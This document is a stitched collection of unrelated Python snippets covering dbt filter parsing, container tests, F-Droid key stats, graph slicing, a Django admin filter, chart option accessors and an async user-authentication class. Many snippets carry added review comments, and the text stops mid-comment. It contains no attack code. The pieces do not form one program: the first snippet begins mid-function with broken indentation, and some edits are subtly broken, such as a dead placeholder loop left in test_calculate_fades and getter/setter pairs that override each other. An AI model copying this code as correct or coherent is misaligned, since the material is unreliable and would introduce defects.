self.tracking.set_env('select_method', 'resource_types')
resource_types = [ResourceType(resource_type) for resource_type in resource_types_match.group(1).split(',')]
data_monitoring_filter = FiltersSchema(resource_types=[ResourceTypeFilterSchema(values=resource_types)], selector=selector)
else:
logger.error(f'Could not parse the given -s/--select: {selector}')
return FiltersSchema(selector=selector, statuses=[])
return data_monitoring_filter
def _create_user_dbt_runner(self, config: Config) -> Optional[DbtRunner]:
    """Build a DbtRunner for the user's dbt project, or None when no
    project directory is configured."""
    if not config.project_dir:
        return None
    return DbtRunner(config.project_dir, config.profiles_dir, config.project_profile_target, env_vars=config.env_vars)
def get_filter(self) -> FiltersSchema:
    """Return the FiltersSchema previously computed and stored on this instance."""
    return self.filter
def _can_use_fetcher(selector):
non_dbt_selectors = ['last_invocation', 'invocation_id', 'invocation_time', 'statuses', 'resource_types']
return all([(selector_type not in selector) for selector_type in non_dbt_selectors]) |
.parametrize('service', BACKEND_SERVICES)
.usefixtures('frappe_site')
def test_frappe_connections_in_backends(service: str, python_path: str, compose: Compose):
    """Copy a connection-probe script into the given backend container and run it there.

    NOTE(review): parametrized over BACKEND_SERVICES and using the frappe_site
    fixture via decorators whose leading text lies outside this view.
    NOTE(review): the literal '(unknown)' inside the f-strings looks like a
    redacted '{filename}' interpolation — `filename` is otherwise unused; confirm
    against upstream before relying on these paths.
    """
    filename = '_ping_frappe_connections.py'
    # Copy the probe into the service container, then execute it with the
    # container's python interpreter from the bench sites directory.
    compose('cp', f'tests/(unknown)', f'{service}:/tmp/')
    compose.exec('-w', '/home/frappe/frappe-bench/sites', service, python_path, f'/tmp/(unknown)')
def store_stats_fdroid_signing_key_fingerprints(appids, indent=None):
    """Write the signing-key fingerprints of the given app ids into a signed JAR.

    Builds stats/publishsigkeys.jar containing publishsigkeys.json, mapping each
    appid (sorted) whose keystore alias has a known fingerprint to its signer,
    then signs the JAR via sign_sig_key_fingerprint_list().

    :param appids: iterable of application ids to include
    :param indent: passed through to json.dumps for pretty-printing
    """
    # exist_ok avoids the check-then-create race of the previous
    # os.path.exists() + os.makedirs() pair.
    os.makedirs('stats', exist_ok=True)
    data = OrderedDict()
    fps = read_fingerprints_from_keystore()
    for appid in sorted(appids):
        alias = key_alias(appid)
        if alias in fps:
            # Reuse the alias computed above instead of calling key_alias() twice.
            data[appid] = {'signer': fps[alias]}
    jar_file = os.path.join('stats', 'publishsigkeys.jar')
    with zipfile.ZipFile(jar_file, 'w', zipfile.ZIP_DEFLATED) as jar:
        jar.writestr('publishsigkeys.json', json.dumps(data, indent=indent))
    sign_sig_key_fingerprint_list(jar_file)
class GraphSlice():
    """Compute the graph slice of an acyclic TransitionCFG: the subgraph of all
    nodes and edges lying on some path from a source block to a sink block.

    NOTE(review): several methods take `cls` (or neither `self` nor `cls`) as
    first parameter — presumably @classmethod/@staticmethod decorators were
    lost in extraction; confirm against upstream.
    """

    def __init__(self, t_cfg: TransitionCFG, source: TransitionBlock, sink: TransitionBlock):
        # Slicing relies on reachability traversals that are only meaningful on a DAG.
        assert t_cfg.is_acyclic(), 'The given transition cfg is not a directed acyclic graph, therefore we can not compute the graph slice!'
        self._t_cfg: TransitionCFG = t_cfg
        self._source: TransitionBlock = source
        self._sink: TransitionBlock = sink
        # Result graph, filled by _compute_graph_slice_for_single_sink_node().
        self._graph_slice = TransitionCFG()

    def compute_graph_slice_for_region(cls, t_cfg: TransitionCFG, source: TransitionBlock, region: Set[TransitionBlock], back_edges: bool=True) -> TransitionCFG:
        """Slice from `source` to every sink node of `region` (see _sink_nodes)."""
        sink_nodes = GraphSlice._sink_nodes(t_cfg, region)
        return GraphSlice.compute_graph_slice_for_sink_nodes(t_cfg, source, sink_nodes, back_edges)

    def compute_graph_slice_for_sink_nodes(cls, t_cfg: TransitionCFG, source: TransitionBlock, sink_nodes: List[TransitionBlock], back_edges: bool=True) -> TransitionCFG:
        """Slice from `source` to all of `sink_nodes`.

        A temporary virtual sink node is attached below every real sink so the
        multi-sink problem reduces to the single-sink computation; the virtual
        node is removed from the result afterwards. With back_edges=False only
        edges whose property is EdgeProperty.non_loop are considered.
        """
        graph = TransitionCFG()
        graph.add_edges_from([edge for edge in t_cfg.edges if (back_edges or (edge.property == EdgeProperty.non_loop))])
        graph.root = source
        virtual_node = graph.create_ast_block()
        instance = cls(graph, source, virtual_node)
        instance._add_virtual_sink_node(virtual_node, sink_nodes)
        instance._compute_graph_slice_for_single_sink_node()
        instance._graph_slice.remove_node(virtual_node)
        instance._graph_slice.condition_handler = t_cfg.condition_handler
        return instance._graph_slice

    def _sink_nodes(t_cfg, region: Set[TransitionBlock]) -> List[TransitionBlock]:
        """Return region nodes with no successors, or with a successor outside the region."""
        sink_nodes = []
        for node in region:
            successors = t_cfg.get_successors(node)
            if (len(successors) == 0):
                sink_nodes.append(node)
            for succ in successors:
                if (succ not in region):
                    sink_nodes.append(node)
                    # One outside successor is enough; avoid duplicate appends.
                    break
        return sink_nodes

    def _compute_graph_slice_for_single_sink_node(self) -> None:
        """Fill self._graph_slice with every node on a source→sink path."""
        if (self._source == self._sink):
            # Degenerate slice: a single node, no edges.
            self._graph_slice.add_node(self._source)
            return
        graph_slice_nodes = self._get_graph_slice_nodes()
        self._construct_graph_slice_with_nodes(graph_slice_nodes)
        self._graph_slice.root = self._source

    def _get_graph_slice_nodes(self) -> Iterator[TransitionBlock]:
        """Yield nodes both reachable from the source and co-reachable to the sink.

        The intersection is obtained by reversing the subgraph of
        source-reachable nodes and traversing it from the sink.
        """
        reachable_from_source: Iterator[TransitionBlock] = self._t_cfg.iter_postorder(self._source)
        reverse_graph = self._construct_reverse_graph_for(reachable_from_source)
        return reverse_graph.iter_postorder(self._sink)

    def _construct_graph_slice_with_nodes(self, graph_slice_nodes: Iterator[TransitionBlock]) -> None:
        """Copy the slice nodes and every original edge joining two slice nodes."""
        self._graph_slice.add_nodes_from(graph_slice_nodes)
        for node in self._graph_slice:
            for predecessor in self._t_cfg.get_predecessors(node):
                if (predecessor in self._graph_slice):
                    self._graph_slice.add_edge(self._t_cfg.get_edge(predecessor, node).copy())

    def _construct_reverse_graph_for(self, subgraph_nodes: Iterator[TransitionBlock]) -> TransitionCFG:
        """Build the edge-reversed subgraph induced by `subgraph_nodes`.

        Edge conditions are irrelevant for reachability, so every reversed edge
        carries the trivially-true condition.
        """
        reverse_graph = TransitionCFG()
        reverse_graph.add_nodes_from([node for node in subgraph_nodes])
        for node in reverse_graph:
            for successor in self._t_cfg.get_successors(node):
                if (successor in reverse_graph):
                    reverse_graph.add_edge(TransitionEdge(successor, node, self._t_cfg.condition_handler.get_true_value()))
        return reverse_graph

    def _add_virtual_sink_node(self, virtual_node: TransitionBlock, sink_nodes: List[TransitionBlock]) -> None:
        """Attach `virtual_node` below every sink with an always-true edge."""
        for sink in sink_nodes:
            self._t_cfg.add_edge(TransitionEdge(sink, virtual_node, self._t_cfg.condition_handler.get_true_value()))
class SettingNamePrefixFilter(admin.SimpleListFilter):
    """Admin list filter offering '_'-separated name prefixes shared by
    several (but not all) Setting rows."""
    title = _('Name Prefix')
    parameter_name = 'name_prefix'

    def lookups(self, request, model_admin):
        """Build the (prefix, label) choices shown in the filter sidebar.

        Every cumulative '_'-joined prefix of every distinct setting name is
        counted. A prefix is kept only when it matches more than one name but
        fewer than all names; then, when a longer prefix selects exactly as
        many rows as a shorter prefix it extends, the shorter (redundant) one
        is dropped. Labels show the prefix with its match count.
        """
        sep = '_'
        names = list(set(Setting.objects.all().values_list('name', flat=True)))
        names_count = len(names)
        names_parts = [name.split(sep) for name in names]
        prefixes = {}
        for name_parts in names_parts:
            name_parts_steps = []
            for name_part in name_parts:
                name_parts_steps.append(name_part)
                # Count each cumulative prefix: 'a', 'a_b', 'a_b_c', ...
                prefix = sep.join(name_parts_steps)
                prefixes.setdefault(prefix, 0)
                prefixes[prefix] += 1
        # Keep prefixes shared by more than one name but not by every name.
        prefixes = {key: value for (key, value) in prefixes.items() if ((value > 1) and (value < names_count))}
        names = set(prefixes.keys())
        # Drop a shorter prefix when a longer one covers the same count of rows.
        for name in names:
            for other_name in names:
                if ((name != other_name) and name.startswith(other_name) and (prefixes.get(name) == prefixes.get(other_name))):
                    prefixes.pop(other_name, None)
        names = sorted(prefixes.keys())
        return [(name, f'{name} ({prefixes[name]})') for name in names]

    def queryset(self, request, queryset):
        """Restrict to settings whose name starts (case-insensitively) with the chosen prefix."""
        prefix = self.value()
        if prefix:
            return queryset.filter(name__istartswith=prefix)
        return queryset
def test_compare(tmp_path, capsys):
    """Run the CLI 'compare' subcommand on two bundled result sets and check
    the rendered comparison table's head and tail in captured stdout."""
    __main__._parse_and_main([*helpers.setup_temp_env(tmp_path), 'compare', 'cpython-3.12.0a0-c20186c397-fc_linux-b2cf916db80e-pyperformance', 'cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance'], __file__)
    expected_start = '\n| Benchmark | cpython-3.12.0a0-c20186c397-fc_linux-b2cf916db80e-pyperformance | cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance |\n '
    expected_end = '\n| Geometric mean | (ref) | 1.31x slower |\n++++\n\nBenchmark hidden because not significant (1): pickle\nIgnored benchmarks (2) of cpython-3.10.4-9d38120e33-fc_linux-b2cf916db80e-pyperformance.json: genshi_text, genshi_xml\n '
    captured = capsys.readouterr()
    # Echo the captured table so a failing run shows it in the pytest report.
    print(captured.out)
    # Compare stripped to tolerate surrounding whitespace differences.
    assert (expected_start.strip() in captured.out)
    assert captured.out.strip().endswith(expected_end.strip())
def test_1():
    """Smoke-test the mord ordinal regressors on the module-level X, y fixture.

    Checks that LogisticAT's mean absolute deviation is no worse than
    LogisticSE's, and that LogisticAT accepts sparse input with MAE < 1.
    NOTE(review): clf1 (OrdinalRidge) is fitted but its predictions are never
    asserted on — it only checks that fit() runs; confirm this is intentional.
    """
    clf1 = mord.OrdinalRidge(alpha=0.0)
    clf1.fit(X, y)
    clf2 = mord.LogisticAT(alpha=0.0)
    clf2.fit(X, y)
    clf3 = mord.LogisticSE(alpha=0.0)
    clf3.fit(X, y)
    pred3 = clf3.predict(X)
    pred2 = clf2.predict(X)
    # LogisticAT should fit at least as well as LogisticSE on training data.
    assert (np.abs((pred2 - y)).mean() <= np.abs((pred3 - y)).mean())
    # Same model must also work on a sparse matrix.
    X_sparse = sparse.csr_matrix(X)
    clf4 = mord.LogisticAT(alpha=0.0)
    clf4.fit(X_sparse, y)
    pred4 = clf4.predict(X_sparse)
    assert (metrics.mean_absolute_error(y, pred4) < 1.0)
class OptionSeriesTreegraphDataEvents(Options):
    """Accessors for treegraph data-point event handlers, stored via the
    Options config machinery.

    NOTE(review): each event appears as a getter/setter pair sharing one name;
    in the generated upstream source these carry @property / @<name>.setter
    decorators. As written here the second def would simply override the
    first — confirm the decorators were lost in extraction, not in the file.
    """
    # click event handler (getter/setter pair).
    def click(self):
        return self._config_get(None)
    def click(self, value: Any):
        self._config(value, js_type=False)
    # drag event handler.
    def drag(self):
        return self._config_get(None)
    def drag(self, value: Any):
        self._config(value, js_type=False)
    # dragStart event handler.
    def dragStart(self):
        return self._config_get(None)
    def dragStart(self, value: Any):
        self._config(value, js_type=False)
    # drop event handler.
    def drop(self):
        return self._config_get(None)
    def drop(self, value: Any):
        self._config(value, js_type=False)
    # mouseOut event handler.
    def mouseOut(self):
        return self._config_get(None)
    def mouseOut(self, value: Any):
        self._config(value, js_type=False)
    # mouseOver event handler.
    def mouseOver(self):
        return self._config_get(None)
    def mouseOver(self, value: Any):
        self._config(value, js_type=False)
    # remove event handler.
    def remove(self):
        return self._config_get(None)
    def remove(self, value: Any):
        self._config(value, js_type=False)
    # select event handler.
    def select(self):
        return self._config_get(None)
    def select(self, value: Any):
        self._config(value, js_type=False)
    # unselect event handler.
    def unselect(self):
        return self._config_get(None)
    def unselect(self, value: Any):
        self._config(value, js_type=False)
    # update event handler.
    def update(self):
        return self._config_get(None)
    def update(self, value: Any):
        self._config(value, js_type=False)
class AMIClientTest(unittest.TestCase):
    """Tests for AMIClient event-listener registration and dispatch."""
    # Class-level defaults, overwritten per test.
    client = None
    event = None

    def setUp(self):
        # `connection` is a module-level dict of AMI connection kwargs.
        self.client = ami.AMIClient(**connection)

    def build_event(self, event='SomeEvent', **kwargs):
        """Construct an ami.Event with the given name and payload."""
        return ami.Event(event, kwargs)

    def test_add_event_listener(self):
        """Listeners fire on dispatched events and honor white_list filtering."""
        def event_listener(event, **kwargs):
            self.event = event
        self.client.add_event_listener(event_listener)
        self.client.fire_recv_event(self.build_event())
        self.assertIsNotNone(self.event)
        self.client.remove_event_listener(event_listener)
        self.assertEqual(len(self.client._event_listeners), 0)
        self.event = None
        # A white_list that doesn't match must suppress delivery.
        listener = self.client.add_event_listener(event_listener, white_list='OtherEvent')
        self.client.fire_recv_event(self.build_event())
        self.assertIsNone(self.event)
        self.client.remove_event_listener(listener)
        self.assertEqual(len(self.client._event_listeners), 0)
        # A matching white_list must deliver again.
        self.client.add_event_listener(event_listener, white_list='SomeEvent')
        self.client.fire_recv_event(self.build_event())
        self.assertIsNotNone(self.event)

    # NOTE(review): class attributes declared mid-class, used by the test below.
    registry_event = None
    varset_event = None

    def test_add_custom_on_event(self):
        """on_<EventName> keyword listeners only receive their named event."""
        def on_varset(event, **kwargs):
            self.varset_event = event
        def on_registry(event, **kwargs):
            self.registry_event = event
        self.client.add_event_listener(on_VarSet=on_varset, on_Registry=on_registry)
        self.client.fire_recv_event(self.build_event('VarSet'))
        self.assertIsNotNone(self.varset_event)
        self.assertIsNone(self.registry_event)
        self.client.fire_recv_event(self.build_event('Registry'))
        self.assertIsNotNone(self.registry_event)
def test_powerline_decoration(manager_nospawn, minimal_conf_noscreen):
    """Exercise PowerLineDecoration paths on a bar of five Spacer widgets and
    verify widget lengths and the decoration's fg/bg colour pairing."""
    config = minimal_conf_noscreen
    config.screens = [libqtile.config.Screen(top=libqtile.bar.Bar([widget.Spacer(length=50, name='one', background='ff0000', decorations=[PowerLineDecoration(size=10, path='arrow_left')]), widget.Spacer(length=50, name='two', background='0000ff', decorations=[PowerLineDecoration(size=10, shift=5, path='arrow_right')]), widget.Spacer(length=50, name='three', background='00ffff', decorations=[PowerLineDecoration(size=10, path='rounded_left')]), widget.Spacer(length=50, name='four', background='ff00ff', decorations=[PowerLineDecoration(size=10, shift=5, path='rounded_right')]), widget.Spacer(length=50, name='five', background='ffffff', decorations=[PowerLineDecoration(size=10, path='zig_zag')])], 10))]
    manager_nospawn.start(config)
    # Force a draw so decorations compute their geometry.
    manager_nospawn.c.bar['top'].eval('self.draw()')
    # Observed: size=10 adds 10px (50 -> 60); shift=5 reclaims 5px (50 -> 55).
    assert (manager_nospawn.c.widget['one'].info()['length'] == 60)
    assert (manager_nospawn.c.widget['two'].info()['length'] == 55)
    # fg is the widget's own background, bg the next widget's background.
    (_, fg) = manager_nospawn.c.widget['one'].eval('self.decorations[0].fg')
    (_, bg) = manager_nospawn.c.widget['one'].eval('self.decorations[0].bg')
    assert (fg == 'ff0000')
    assert (bg == '0000ff')
    (_, fg) = manager_nospawn.c.widget['four'].eval('self.decorations[0].fg')
    (_, bg) = manager_nospawn.c.widget['four'].eval('self.decorations[0].bg')
    assert (fg == 'ffffff')
    assert (bg == 'ff00ff')
def test_calculate_fades():
    """Table-driven check of TrackFader.calculate_fades().

    Each row is (fade_in, fade_out, start, stop, track_len,
    expected t0, t1, t2, t3); None means 'no fade on that side'.
    """
    fader = TrackFader(None, None, None)
    calcs = [(0, 4, 0, 0, 10, 0, 0, 6, 10), (None, 4, 0, 0, 10, 0, 0, 6, 10), (4, 0, 0, 0, 10, 0, 4, 10, 10), (4, None, 0, 0, 10, 0, 4, 10, 10), (4, 4, 0, 0, 10, 0, 4, 6, 10), (0, 0, 0, 0, 10, 0, 0, 10, 10), (None, None, 0, 0, 10, 0, 0, 10, 10), (0, 4, 0, 0, 2, 0, 0, 0, 2), (4, 0, 0, 0, 2, 0, 2, 2, 2), (4, 4, 0, 0, 2, 0, 1, 1, 2), (4, 4, 1, 0, 10, 1, 5, 6, 10), (4, 4, 0, 9, 10, 0, 4, 5, 9), (2, 2, 1, 9, 10, 1, 3, 7, 9), (4, 4, 4, 8, 10, 4, 6, 6, 8), (2, 4, 4, 7, 10, 4, 5, 5, 7), (4, 2, 4, 7, 10, 4, 6, 6, 7)]
    # enumerate() replaces the previous manually-incremented counter.
    for i, (fin, fout, start, stop, tlen) in enumerate(row[:5] for row in calcs):
        pass  # placeholder removed below
    for i, (fin, fout, start, stop, tlen, t0, t1, t2, t3) in enumerate(calcs):
        # Print the case index so a failing assert is easy to locate.
        print(('%2d: Fade In: %s; Fade Out: %s; start: %s; stop: %s; Len: %s' % (i, fin, fout, start, stop, tlen)))
        track = FakeTrack(start, stop, tlen)
        assert (fader.calculate_fades(track, fin, fout) == (t0, t1, t2, t3))
def output(title, collection, plotter):
    """Emit an RST gallery section for `collection`, rendering one SVG per item.

    Prints a capitalized section heading, then for each item a sub-heading,
    renders `plotter(item, svg_path)` into _static/gallery/<title>/<item>.svg
    under DOCS (skipping items whose SVG already exists), and prints the RST
    image directive. Plotter failures are reported to stdout without aborting
    the remaining items.

    :param title: section name; also the gallery subdirectory name
    :param collection: iterable of item names
    :param plotter: callable (name, path) that writes the SVG file
    """
    print()
    print((title[0].upper() + title[1:]))
    print(('-' * len(title)))
    print()
    # Removed a dead `path = os.path` alias: it was reassigned before any use.
    for p in collection:
        print()
        print(p)
        print(('^' * len(p)))
        image = ('_static/gallery/%s/%s.svg' % (title, p))
        path = os.path.join(DOCS, image)
        if (not os.path.exists(path)):
            # exist_ok replaces the previous try/except FileExistsError dance.
            os.makedirs(os.path.dirname(path), exist_ok=True)
            try:
                plotter(p, path)
            except Exception:
                # Best-effort: report the failing target and keep going.
                print(path)
                print(traceback.format_exc())
        print()
        print('.. image::', ('/' + image))
        print('   :width: 600')
        print()
def test_set_container_security_context():
    """Verify the chart's container securityContext: defaults apply, and
    user-supplied values merge with (and override) those defaults."""
    # Default values: no securityContext overrides.
    config = ''
    r = helm_template(config)
    c = r['statefulset'][name]['spec']['template']['spec']['containers'][0]
    assert (c['securityContext']['capabilities']['drop'] == ['ALL'])
    assert (c['securityContext']['runAsNonRoot'] == True)
    assert (c['securityContext']['runAsUser'] == 1000)
    # Overrides: runAsUser replaced, unknown key passed through, defaults kept.
    config = '\n  securityContext:\n    runAsUser: 1001\n    other: test\n'
    r = helm_template(config)
    c = r['statefulset'][name]['spec']['template']['spec']['containers'][0]
    assert (c['securityContext']['capabilities']['drop'] == ['ALL'])
    assert (c['securityContext']['runAsNonRoot'] == True)
    assert (c['securityContext']['runAsUser'] == 1001)
    assert (c['securityContext']['other'] == 'test')
class PlaybackAdapter():
    """Base class that wires playback-related player events to overridable
    on_<event> hook methods.

    On construction it subscribes to the player's playback events and, if a
    track is already playing, replays the start (and pause) notifications so
    subclasses see a consistent initial state.
    """

    def __init__(self, player):
        self.__player = player
        self.__events = ('playback_track_start', 'playback_track_end', 'playback_player_end', 'playback_toggle_pause', 'playback_error')
        # Subscribe each hook method to its matching event on this player.
        for event_name in self.__events:
            handler = getattr(self, ('on_%s' % event_name))
            event.add_callback(handler, event_name, player)
        # Synthesize notifications for playback already in progress.
        if (player.current is not None):
            self.on_playback_track_start('playback_track_start', player, player.current)
            if player.is_paused():
                self.on_playback_toggle_pause('playback_toggle_pause', player, player.current)

    def destroy(self):
        """Unsubscribe every hook registered in __init__."""
        for event_name in self.__events:
            handler = getattr(self, ('on_%s' % event_name))
            event.remove_callback(handler, event_name, self.__player)

    def on_playback_track_start(self, event, player, track):
        """No-op hook; override to react to a track starting."""

    def on_playback_track_end(self, event, player, track):
        """No-op hook; override to react to a track ending."""

    def on_playback_player_end(self, event, player, track):
        """No-op hook; override to react to the player stopping."""

    def on_playback_toggle_pause(self, event, player, track):
        """No-op hook; override to react to pause/unpause."""

    def on_playback_error(self, event, player, message):
        """No-op hook; override to react to playback errors."""
class OptionSeriesArearangeDataDatalabelsTextpath(Options):
    """Accessors for the arearange data-label textPath options.

    NOTE(review): getter/setter pairs share a name — presumably
    @property/@<name>.setter decorators lost in extraction; as written the
    later def overrides the earlier. Confirm against upstream.
    """
    # attributes: raw SVG attributes object for the text path.
    def attributes(self):
        return self._config_get(None)
    def attributes(self, value: Any):
        self._config(value, js_type=False)
    # enabled: whether the text path is active (defaults False).
    def enabled(self):
        return self._config_get(False)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
def iter_commits(until=None, headers=None):
    """Yield commit dicts from the Falcon repository API, newest page first.

    Pages through /commits until an empty page is returned, or until a commit
    whose sha starts with `until` is reached (that commit is not yielded).

    :param until: optional sha prefix at which to stop iterating
    :param headers: optional HTTP headers (e.g. auth token) for each request
    """
    # Single request/paginate loop replaces the previously duplicated
    # request + raise_for_status + json block before and inside the loop.
    page = 1
    uri = f'{FALCON_REPOSITORY_API}/commits'
    while True:
        resp = requests.get(uri, headers=headers)
        resp.raise_for_status()
        commits = resp.json()
        if not commits:
            return
        for commit in commits:
            if until and commit['sha'].startswith(until):
                return
            yield commit
        page += 1
        uri = f'{FALCON_REPOSITORY_API}/commits?page={page}'
class User():
    """Lightweight user record plus the user-related exception hierarchy and
    the async `Objects` accessor for user persistence.

    NOTE(review): leading indentation was normalized during extraction; the
    nesting below (exceptions and Objects inside User) follows the references
    `User.DoesNotExist` / `cls.hash_password` made by the Objects methods.
    NOTE(review): Objects methods take `cls` — presumably @classmethod
    decorators were lost in extraction; confirm against upstream.
    """
    __slots__ = ['uid', 'username', 'password', 'is_admin']

    def __init__(self, uid, username, password, is_admin=False):
        self.uid = uid
        self.username = username
        self.password = password
        self.is_admin = is_admin

    def __repr__(self):
        template = 'User id={s.uid}: <{s.username}, is_admin={s.is_admin}>'
        return template.format(s=self)

    def __str__(self):
        return self.__repr__()

    class DoesNotExist(Exception):
        """No user matched the given id/name."""
        pass

    class UserAlreadyExists(Exception):
        """A user with the same name already exists."""
        pass

    class PasswordDoesNotMatch(Exception):
        """Supplied password failed verification."""
        pass

    class PasswordAlreadyUsed(Exception):
        """New password matches an entry in the password history."""
        pass

    class PasswordExpired(Exception):
        """Password age exceeded the configured maximum."""
        pass

    class InvalidToken(Exception):
        """Auth token not found in user_logins."""
        pass

    class TokenExpired(Exception):
        """Auth token found but past its expiration time."""
        pass

    class Objects():
        """Async persistence/auth operations over the users-related tables."""

        async def get_roles(cls):
            """Return every row of the 'roles' table."""
            storage_client = connect.get_storage_async()
            result = (await storage_client.query_tbl('roles'))
            return result['rows']

        async def get_role_id_by_name(cls, name):
            """Return rows holding the id of the role named `name`."""
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().SELECT('id').WHERE(['name', '=', name]).payload()
            result = (await storage_client.query_tbl_with_payload('roles', payload))
            return result['rows']

        async def create(cls, username, password, role_id, access_method='any', real_name='', description=''):
            """Insert a new user (password stored hashed) and audit-log USRAD
            with the password removed from the logged payload."""
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().INSERT(uname=username, pwd=(cls.hash_password(password) if password else ''), access_method=access_method, role_id=role_id, real_name=real_name, description=description).payload()
            try:
                result = (await storage_client.insert_into_tbl('users', payload))
                audit = AuditLogger(storage_client)
                audit_details = json.loads(payload)
                # Never write the (hashed) password into the audit trail.
                audit_details.pop('pwd', None)
                audit_details['message'] = "'{}' username created for '{}' user.".format(username, real_name)
                (await audit.information('USRAD', audit_details))
            except StorageServerError as ex:
                # NOTE(review): the retryable check is a no-op — ValueError is
                # raised unconditionally after it. Confirm intended behavior.
                if ex.error['retryable']:
                    pass
                raise ValueError(ERROR_MSG)
            return result

        async def delete(cls, user_id):
            """Soft-delete a user (set enabled='f'); user id 1 is protected.
            Also revokes the user's tokens and audit-logs USRDL."""
            if (int(user_id) == 1):
                raise ValueError('Super admin user can not be deleted')
            storage_client = connect.get_storage_async()
            try:
                (await cls.delete_user_tokens(user_id))
                payload = PayloadBuilder().SET(enabled='f').WHERE(['id', '=', user_id]).AND_WHERE(['enabled', '=', 't']).payload()
                result = (await storage_client.update_tbl('users', payload))
                audit = AuditLogger(storage_client)
                (await audit.information('USRDL', {'user_id': user_id, 'message': 'User ID: <{}> has been disabled.'.format(user_id)}))
            except StorageServerError as ex:
                # NOTE(review): no-op retryable check, see create().
                if ex.error['retryable']:
                    pass
                raise ValueError(ERROR_MSG)
            return result

        async def update(cls, user_id, user_data):
            """Update selected user fields; returns True on success.

            Password changes are checked against the password history, revoke
            the user's tokens (as do role changes), and the audit record masks
            the password. Returns False when `user_data` is empty.
            """
            if (not user_data):
                return False
            old_data = (await cls.get(uid=user_id))
            new_kwargs = {}
            old_kwargs = {}
            if ('access_method' in user_data):
                old_kwargs['access_method'] = old_data['access_method']
                new_kwargs.update({'access_method': user_data['access_method']})
            if ('real_name' in user_data):
                old_kwargs['real_name'] = old_data['real_name']
                new_kwargs.update({'real_name': user_data['real_name']})
            if ('description' in user_data):
                old_kwargs['description'] = old_data['description']
                new_kwargs.update({'description': user_data['description']})
            if ('role_id' in user_data):
                old_kwargs['role_id'] = old_data['role_id']
                new_kwargs.update({'role_id': user_data['role_id']})
            storage_client = connect.get_storage_async()
            hashed_pwd = None
            pwd_history_list = []
            if ('password' in user_data):
                if len(user_data['password']):
                    hashed_pwd = cls.hash_password(user_data['password'])
                    current_datetime = datetime.now()
                    # Mask the old password in the audit diff.
                    old_kwargs['pwd'] = '****'
                    new_kwargs.update({'pwd': hashed_pwd, 'pwd_last_changed': str(current_datetime)})
                    # Raises PasswordAlreadyUsed if the new password was used before.
                    pwd_history_list = (await cls._get_password_history(storage_client, user_id, user_data))
            try:
                payload = PayloadBuilder().SET(**new_kwargs).WHERE(['id', '=', user_id]).AND_WHERE(['enabled', '=', 't']).payload()
                result = (await storage_client.update_tbl('users', payload))
                if result['rows_affected']:
                    # Credential/role changes invalidate existing sessions.
                    if (('password' in user_data) or ('role_id' in user_data)):
                        (await cls.delete_user_tokens(user_id))
                    if ('password' in user_data):
                        (await cls._insert_pwd_history_with_oldest_pwd_deletion_if_count_exceeds(storage_client, user_id, hashed_pwd, pwd_history_list))
                    audit = AuditLogger(storage_client)
                    if ('pwd' in new_kwargs):
                        # Do not leak the new hash into the audit trail.
                        new_kwargs['pwd'] = 'Password has been updated.'
                        new_kwargs.pop('pwd_last_changed', None)
                    (await audit.information('USRCH', {'user_id': user_id, 'old_value': old_kwargs, 'new_value': new_kwargs, 'message': "'{}' user has been changed.".format(old_data['uname'])}))
                return True
            except StorageServerError as ex:
                # NOTE(review): no-op retryable check, see create().
                if ex.error['retryable']:
                    pass
                raise ValueError(ERROR_MSG)
            except Exception:
                raise

        async def is_user_exists(cls, uid, password):
            """Return `uid` when an enabled user with this id exists and the
            password verifies; otherwise None."""
            payload = PayloadBuilder().SELECT('uname', 'pwd').WHERE(['id', '=', uid]).AND_WHERE(['enabled', '=', 't']).payload()
            storage_client = connect.get_storage_async()
            result = (await storage_client.query_tbl_with_payload('users', payload))
            if (len(result['rows']) == 0):
                return None
            found_user = result['rows'][0]
            is_valid_pwd = cls.check_password(found_user['pwd'], str(password))
            return (uid if is_valid_pwd else None)

        async def all(cls):
            """Return every row of the 'users' table (including disabled)."""
            storage_client = connect.get_storage_async()
            result = (await storage_client.query_tbl('users'))
            return result['rows']

        async def filter(cls, **kwargs):
            """Return enabled user rows filtered by optional uid/username kwargs."""
            user_id = kwargs['uid']
            user_name = kwargs['username']
            q = PayloadBuilder().SELECT('id', 'uname', 'role_id', 'access_method', 'real_name', 'description').WHERE(['enabled', '=', 't'])
            if (user_id is not None):
                q = q.AND_WHERE(['id', '=', user_id])
            if (user_name is not None):
                q = q.AND_WHERE(['uname', '=', user_name])
            storage_client = connect.get_storage_async()
            q_payload = PayloadBuilder(q.chain_payload()).payload()
            result = (await storage_client.query_tbl_with_payload('users', q_payload))
            return result['rows']

        async def get(cls, uid=None, username=None):
            """Return the single enabled user matching uid and/or username.

            :raises User.DoesNotExist: when no row matches
            """
            users = (await cls.filter(uid=uid, username=username))
            if (len(users) == 0):
                msg = ''
                if uid:
                    msg = 'User with id:<{}> does not exist'.format(uid)
                if username:
                    msg = 'User with name:<{}> does not exist'.format(username)
                if (uid and username):
                    msg = 'User with id:<{}> and name:<{}> does not exist'.format(uid, username)
                raise User.DoesNotExist(msg)
            return users[0]

        async def refresh_token_expiry(cls, token):
            """Extend the token's expiration by JWT_EXP_DELTA_SECONDS from now."""
            storage_client = connect.get_storage_async()
            exp = (datetime.now() + timedelta(seconds=JWT_EXP_DELTA_SECONDS))
            payload = PayloadBuilder().SET(token_expiration=str(exp)).WHERE(['token', '=', token]).MODIFIER(['allowzero']).payload()
            (await storage_client.update_tbl('user_logins', payload))

        async def validate_token(cls, token):
            """Validate a stored token and return the uid embedded in the JWT.

            :raises User.InvalidToken: token not present in user_logins
            :raises User.TokenExpired: token past its expiration time
            """
            storage_client = connect.get_storage_async()
            payload = PayloadBuilder().SELECT('token_expiration').ALIAS('return', ('token_expiration', 'token_expiration')).FORMAT('return', ('token_expiration', 'YYYY-MM-DD HH24:MI:SS.MS')).WHERE(['token', '=', token]).payload()
            result = (await storage_client.query_tbl_with_payload('user_logins', payload))
            if (len(result['rows']) == 0):
                raise User.InvalidToken('Token appears to be invalid')
            r = result['rows'][0]
            token_expiry = r['token_expiration']
            curr_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')
            fmt = '%Y-%m-%d %H:%M:%S.%f'
            diff = (datetime.strptime(token_expiry, fmt) - datetime.strptime(curr_time, fmt))
            # NOTE(review): timedelta.seconds is always in 0..86399; for an
            # expired token the negativity shows up in diff.days, so this
            # check can never fire as written. Looks like it should be
